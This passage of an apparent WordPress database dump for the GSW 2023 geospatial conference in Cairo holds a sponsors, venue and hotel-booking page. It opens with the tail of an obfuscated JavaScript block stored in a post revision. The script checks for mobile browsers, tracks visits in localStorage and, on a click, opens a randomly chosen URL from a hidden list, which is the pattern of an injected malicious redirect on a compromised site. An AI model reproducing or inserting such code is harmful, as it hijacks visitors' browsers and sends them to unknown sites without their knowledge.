wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 23:23:19','2023-08-15 23:23:19','',3066,'https://gsw2023.com/?p=5218',0,'revision','',0),
(5219,1,'2023-08-15 23:24:01','2023-08-15 23:24:01','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>                    Platinum Sponsors</strong></span></h4>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731943{margin-top: -15px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" 